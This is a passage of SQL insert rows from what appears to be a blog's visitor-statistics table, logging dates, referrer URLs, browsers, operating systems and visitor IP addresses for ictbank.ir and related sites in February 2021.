(8534,'2021-02-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.157.78.152','000',0,1,0),
(8535,'2021-02-01','http://ictbank.ir/blog','Chrome','OS X','10.15.6',NULL,NULL,'','54.154.240.147','000',0,1,0),
(8536,'2021-02-01','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','5.101.137.195','000',0,2,0),
(8537,'2021-02-01','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','185.142.26.203','000',0,2,0),
(8538,'2021-02-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.165.200','000',0,1,0),
(8539,'2021-02-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8540,'2021-02-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.137.154','000',0,1,0),
(8541,'2021-02-01','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','217.138.192.28','000',0,2,0),
(8542,'2021-02-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.206.169.241','000',0,2,0),
(8543,'2021-02-01','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.134.115.137','000',0,1,0),
(8544,'2021-02-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8545,'2021-02-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.4.46','000',0,1,0),
(8546,'2021-02-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.195.100.208','000',0,1,0),
(8547,'2021-02-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.248.119.121','000',0,1,0),
(8548,'2021-02-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.169.255.37','000',0,2,0),
(8549,'2021-02-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(8550,'2021-02-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(8551,'2021-02-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(8552,'2021-02-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(8553,'2021-02-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(8554,'2021-02-01','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','156.195.225.108','000',0,1,0),
(8555,'2021-02-01','http://ictbank.ir/blog','Facebook','iOS','13.1.3',NULL,NULL,'','192.145.127.204','000',0,2,0),
(8556,'2021-02-01','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','121.123.91.63','000',0,2,0),
(8557,'2021-02-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.113.215','000',0,1,0),
(8558,'2021-02-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.113.31','000',0,1,0),
(8559,'2021-02-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,1,0),
(8560,'2021-02-02','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','52.215.188.210','000',0,1,0),
(8561,'2021-02-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(8562,'2021-02-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','139.28.219.108','000',0,2,0),
(8563,'2021-02-02','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','84.247.50.60','000',0,2,0),
(8564,'2021-02-02','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','54.233.239.45','000',0,1,0),
(8565,'2021-02-02','http://ictbank.ir/blog','Firefox','Windows','6.2',NULL,NULL,'','13.56.229.77','000',0,1,0),
(8566,'2021-02-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8567,'2021-02-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','69.175.12.98','000',0,1,0),
(8568,'2021-02-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','13.53.64.97','000',0,5,0),
(8569,'2021-02-02','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','45.152.181.20','000',0,2,0),
(8570,'2021-02-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.245.104','000',0,1,0),
(8571,'2021-02-02','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','180.166.76.66','000',0,1,0),
(8572,'2021-02-02','http://ictbank.ir/blog','Unknown','FireOS','5',NULL,NULL,'','82.102.18.100','000',0,2,0),
(8573,'2021-02-02','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.238.252.159','000',0,1,0),
(8574,'2021-02-02','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','46.238.4.95','000',0,2,0),
(8575,'2021-02-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.238.53','000',0,1,0),
(8576,'2021-02-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,1,0),
(8577,'2021-02-02','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.153.151.34','000',0,2,0),
(8578,'2021-02-02','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','54.94.57.144','000',0,1,0),
(8579,'2021-02-02','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','185.41.152.211','000',0,1,0),
(8580,'2021-02-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.45.64.104','000',0,1,0),
(8581,'2021-02-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(8582,'2021-02-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(8583,'2021-02-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(8584,'2021-02-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8585,'2021-02-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(8586,'2021-02-02','http://ictbank.ir/blog','Chrome','Android','4.4.2',NULL,NULL,'','51.159.88.51','000',0,2,0),
(8587,'2021-02-02','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','14.99.155.181','000',0,2,0),
(8588,'2021-02-02','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.240.236.190','000',0,10,0),
(8589,'2021-02-02','http://ictbank.ir/blog','Internet Explorer','Windows','4.1',NULL,NULL,'','185.230.127.84','000',0,2,0),
(8590,'2021-02-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(8591,'2021-02-03','http://ictbank.ir/blog','Instagram','Android','8.1.0',NULL,NULL,'','217.138.218.188','000',0,2,0),
(8592,'2021-02-03','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','52.65.15.196','000',0,5,0),
(8593,'2021-02-03','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','15.228.90.213','000',0,1,0),
(8594,'2021-02-03','https://buygenericneurontin.tumblr.com/','Chrome','Windows','6.1',NULL,NULL,'','178.159.37.24','000',0,1,0),
(8595,'2021-02-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.0',NULL,NULL,'','196.196.217.44','000',0,2,0),
(8596,'2021-02-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.95.58','000',0,1,0),
(8597,'2021-02-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.95.46','000',0,1,0),
(8598,'2021-02-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.110.47','000',0,1,0),
(8599,'2021-02-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','69.175.12.98','000',0,1,0),
(8600,'2021-02-03','http://ictbank.ir/blog','UC Browser','Android','4.4.2',NULL,NULL,'','196.240.57.196','000',0,2,0),
(8601,'2021-02-03','https://google.com','Chrome','Windows','6.1',NULL,NULL,'','185.4.65.44','000',0,1,0),
(8602,'2021-02-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8603,'2021-02-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','42.194.142.186','000',0,2,0),
(8604,'2021-02-03','http://ictbank.ir/blog','Chrome','Windows','6.4',NULL,NULL,'','34.203.37.48','000',0,5,0),
(8605,'2021-02-03','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','150.158.160.5','000',0,2,0),
(8606,'2021-02-03','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','35.170.73.37','000',0,1,0),
(8607,'2021-02-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.71.121.146','000',0,1,0),
(8608,'2021-02-03','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','194.110.114.196','000',0,2,0),
(8609,'2021-02-03','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','82.207.97.87','000',0,2,0),
(8610,'2021-02-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.36','000',0,4,0),
(8611,'2021-02-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(8612,'2021-02-03','http://ictbank.ir/blog','Android Browser','Android','4.0.4',NULL,NULL,'','196.240.57.188','000',0,2,0),
(8613,'2021-02-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(8614,'2021-02-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(8615,'2021-02-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(8616,'2021-02-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(8617,'2021-02-03','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','45.172.218.35','000',0,1,0),
(8618,'2021-02-03','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','89.34.98.107','000',0,2,0),
(8619,'2021-02-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.255.65.124','000',0,10,0),
(8620,'2021-02-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.157.2','000',0,1,0),
(8621,'2021-02-03','http://ictbank.ir/blog','Facebook','Android','6.0.1',NULL,NULL,'','185.236.42.17','000',0,2,0),
(8622,'2021-02-04','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.231.78.233','000',0,1,0),
(8623,'2021-02-04','http://ictbank.ir/blog','UC Browser','Series60','2.8',NULL,NULL,'','139.28.219.108','000',0,2,0),
(8624,'2021-02-04','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','115.75.91.79','000',0,2,0),
(8625,'2021-02-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(8626,'2021-02-04','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','2.57.122.21','000',0,1,0),
(8627,'2021-02-04','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,1,0),
(8628,'2021-02-04','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(8629,'2021-02-04','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.101.136.148','000',0,2,0),
(8630,'2021-02-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.233.188','000',0,1,0),
(8631,'2021-02-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','99.198.101.34','000',0,1,0),
(8632,'2021-02-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8633,'2021-02-04','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','213.232.87.100','000',0,2,0),
(8634,'2021-02-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(8635,'2021-02-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8636,'2021-02-04','http://ictbank.ir/blog','Android Browser','Android','4.0.4',NULL,NULL,'','85.208.72.243','000',0,2,0),
(8637,'2021-02-04','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.224.252.207','000',0,1,0),
(8638,'2021-02-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.70.60','000',0,1,0),
(8639,'2021-02-04','http://ictbank.ir/blog','Opera','Windows','6.3',NULL,NULL,'','185.245.84.188','000',0,2,0),
(8640,'2021-02-04','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.238.12.116','000',0,1,0),
(8641,'2021-02-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(8642,'2021-02-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8643,'2021-02-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(8644,'2021-02-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(8645,'2021-02-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(8646,'2021-02-04','http://ictbank.ir/blog','Facebook','iOS','12.3.1',NULL,NULL,'','77.75.120.132','000',0,2,0),
(8647,'2021-02-04','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.234.57.117','000',0,3,0),
(8648,'2021-02-04','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','185.220.70.226','000',0,2,0),
(8649,'2021-02-04','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.228.46.232','000',0,1,0),
(8650,'2021-02-05','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','125.161.129.115','000',0,2,0),
(8651,'2021-02-05','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','116.202.113.215','000',0,1,0),
(8652,'2021-02-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','196.240.57.172','000',0,4,0),
(8653,'2021-02-05','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.165','000',0,1,0),
(8654,'2021-02-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.7','000',0,1,0),
(8655,'2021-02-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(8656,'2021-02-05','http://ictbank.ir/blog','Unknown','Android','7.0',NULL,NULL,'','139.28.219.108','000',0,2,0),
(8657,'2021-02-05','http://ictbank.ir/blog','Firefox Mobile','Android','10',NULL,NULL,'','98.224.186.147','000',0,1,0),
(8658,'2021-02-05','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','37.193.108.45','000',0,2,0),
(8659,'2021-02-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(8660,'2021-02-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(8661,'2021-02-05','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','124.13.33.180','000',0,2,0),
(8662,'2021-02-05','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','37.143.118.168','000',0,1,0),
(8663,'2021-02-05','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,1,0),
(8664,'2021-02-05','http://82.102.9.14/blog','Internet Explorer','Windows','Unknown',NULL,NULL,'','205.185.121.107','000',0,1,0),
(8665,'2021-02-05','www.google.com','Unknown','Android','7.0',NULL,NULL,'','158.101.172.34','000',0,2,0),
(8666,'2021-02-05','http://ictbank.ir/blog','Safari','iOS','3.2',NULL,NULL,'','220.181.77.162','000',0,3,0),
(8667,'2021-02-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8668,'2021-02-05','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','118.70.176.130','000',0,2,0),
(8669,'2021-02-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.247.174','000',0,1,0),
(8670,'2021-02-05','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','141.98.103.188','000',0,2,0),
(8671,'2021-02-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','2.184.48.163','000',0,1,0),
(8672,'2021-02-05','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.218.142.228','000',0,1,0),
(8673,'2021-02-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.78.34','000',0,1,0),
(8674,'2021-02-05','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.228.46.232','000',0,1,0),
(8675,'2021-02-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,1,0),
(8676,'2021-02-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(8677,'2021-02-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(8678,'2021-02-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8679,'2021-02-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(8680,'2021-02-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','88.99.73.200','000',0,1,0),
(8681,'2021-02-05','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','185.253.98.102','000',0,2,0),
(8682,'2021-02-05','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','73.216.241.7','000',0,1,0),
(8683,'2021-02-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(8684,'2021-02-06','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','51.79.86.175','000',0,1,0),
(8685,'2021-02-06','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,1,0),
(8686,'2021-02-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(8687,'2021-02-06','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','178.175.132.78','000',0,2,0),
(8688,'2021-02-06','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.65.15.196','000',0,5,0),
(8689,'2021-02-06','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','113.175.240.41','000',0,2,0),
(8690,'2021-02-06','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','91.132.138.196','000',0,2,0),
(8691,'2021-02-06','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','85.10.56.133','000',0,2,0),
(8692,'2021-02-06','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.85.237.163','000',0,3,0),
(8693,'2021-02-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.91.138.189','000',0,1,0),
(8694,'2021-02-06','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','103.94.139.106','000',0,2,0),
(8695,'2021-02-06','http://ictbank.ir/blog','Instagram','Android','7.1.1',NULL,NULL,'','185.236.42.79','000',0,2,0),
(8696,'2021-02-06','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','121.4.101.192','000',0,2,0),
(8697,'2021-02-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','195.181.161.8','000',0,2,0),
(8698,'2021-02-06','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,4,0),
(8699,'2021-02-06','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','54.233.206.29','000',0,1,0),
(8700,'2021-02-06','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','54.94.20.54','000',0,1,0),
(8701,'2021-02-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8702,'2021-02-06','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','35.181.87.238','000',0,5,0),
(8703,'2021-02-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.163.86.201','000',0,1,0),
(8704,'2021-02-06','http://ictbank.ir/blog','Facebook','Android','6.0',NULL,NULL,'','196.240.54.4','000',0,2,0),
(8705,'2021-02-06','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','116.203.118.216','000',0,1,0),
(8706,'2021-02-06','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','85.254.72.27','000',0,2,0),
(8707,'2021-02-06','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.177.113','000',0,1,0),
(8708,'2021-02-06','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','52.90.66.252','000',0,1,0),
(8709,'2021-02-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(8710,'2021-02-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(8711,'2021-02-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(8712,'2021-02-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8713,'2021-02-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.182.203','000',0,1,0),
(8714,'2021-02-06','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','90.229.252.98','000',0,1,0),
(8715,'2021-02-06','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','180.241.44.158','000',0,2,0),
(8716,'2021-02-06','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','119.39.46.137','000',0,1,0),
(8717,'2021-02-07','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','54.194.159.230','000',0,1,0),
(8718,'2021-02-07','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','123.25.41.102','000',0,2,0),
(8719,'2021-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','124.89.86.28','000',0,1,0),
(8720,'2021-02-07','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.149.252.108','000',0,1,0),
(8721,'2021-02-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(8722,'2021-02-07','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,1,0),
(8723,'2021-02-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','89.190.156.59','000',0,1,0),
(8724,'2021-02-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(8725,'2021-02-07','https://www.google.com/','Chrome','Android','11',NULL,NULL,'','174.52.216.49','000',0,1,0),
(8726,'2021-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','44.228.162.80','000',0,1,0),
(8727,'2021-02-07','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.231.133.248','000',0,1,0),
(8728,'2021-02-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8729,'2021-02-07','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','86.122.77.106','000',0,2,0),
(8730,'2021-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.67.223','000',0,11,0),
(8731,'2021-02-07','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','24.133.176.210','000',0,5,0),
(8732,'2021-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.146.58','000',0,1,0),
(8733,'2021-02-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.62.171','000',0,1,0),
(8734,'2021-02-07','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','201.214.123.159','000',0,1,0),
(8735,'2021-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.100','000',0,4,0),
(8736,'2021-02-07','http://www.google.com/','Chrome','Android','10',NULL,NULL,'','68.62.103.232','000',0,1,0),
(8737,'2021-02-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.176.188.51','000',0,5,0),
(8738,'2021-02-07','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','94.20.96.196','000',0,2,0),
(8739,'2021-02-07','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','188.227.106.151','000',0,1,0),
(8740,'2021-02-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(8741,'2021-02-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(8742,'2021-02-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(8743,'2021-02-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(8744,'2021-02-07','http://ictbank.ir/blog','Chrome','OS X','10.15.6',NULL,NULL,'','34.254.255.25','000',0,1,0),
(8745,'2021-02-07','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','35.153.198.206','000',0,1,0),
(8746,'2021-02-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(8747,'2021-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.105.166','000',0,1,0),
(8748,'2021-02-07','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.130','000',0,1,0),
(8749,'2021-02-07','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','185.245.85.23','000',0,2,0),
(8750,'2021-02-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','198.71.48.81','000',0,1,0),
(8751,'2021-02-08','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.231.134.79','000',0,1,0),
(8752,'2021-02-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(8753,'2021-02-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(8754,'2021-02-08','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,1,0),
(8755,'2021-02-08','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','185.245.85.23','000',0,2,0),
(8756,'2021-02-08','http://ictbank.ir/blog','Chrome','Windows','6.4',NULL,NULL,'','54.250.87.247','000',0,5,0),
(8757,'2021-02-08','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.1',NULL,NULL,'','77.243.191.35','000',0,2,0),
(8758,'2021-02-08','http://ictbank.ir/blog','Samsung Internet','Android','10',NULL,NULL,'','172.27.240.252','000',0,2,0),
